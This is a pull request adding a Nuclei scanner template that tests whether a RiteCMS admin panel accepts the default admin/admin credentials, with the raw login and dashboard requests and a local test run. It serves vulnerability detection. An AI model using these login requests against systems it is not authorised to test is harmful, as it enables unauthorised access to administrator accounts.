### PR TITLE
Create ritecms-default-login.yaml

### DIFF
--- a/ritecms-default-login.yaml
+++ b/ritecms-default-login.yaml
@@ -1,0 +1,47 @@
+id: ritecms-default-login
+
+info:
+  name: RiteCMS - Default Credentials
+  author: 0x_Akoko
+  severity: high
+  description: >
+    Attempts to log in to the RiteCMS admin panel using the default
+    administrator credentials (admin/admin). It then validates the login
+    by accessing the dashboard and checking the page title.
+  reference:
+    - https://ritecms.com/
+  classification:
+    cwe-id: CWE-798
+  metadata:
+    verified: true
+    max-request: 2
+  tags: ritecms,default-login,creds,auth-bypass
+
+http:
+  - raw:
+      - |
+        POST {{BaseURL}}/ritecms/admin.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username=admin&userpw=admin
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 302"
+          - "contains(header, 'Set-Cookie: PHPSESSID')"
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET {{BaseURL}}/ritecms/admin.php HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "contains(body, '<title>RiteCMS - Administration</title>')"


### PR DESCRIPTION
### Template / PR Information

RiteCMS - Default Credentials
Attempts to log in to the RiteCMS admin panel using the default administrator credentials (admin/admin). It then validates the login by accessing the dashboard and checking the page title.

- References: https://github.com/handylulu/RiteCMS/

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


```
root@LAPTOP-VUMRCEKO:/mnt/d/Nuclei/ritecms# nuclei -u "http://172.17.96.1" -t ritecms-default-login.yaml

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[ritecms-default-login] [http] [high] http://172.17.96.1/ritecms/admin.php
[INF] Scan completed in 29.080513ms. 1 matches found.
root@LAPTOP-VUMRCEKO:/mnt/d/Nuclei/ritecms#
```

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)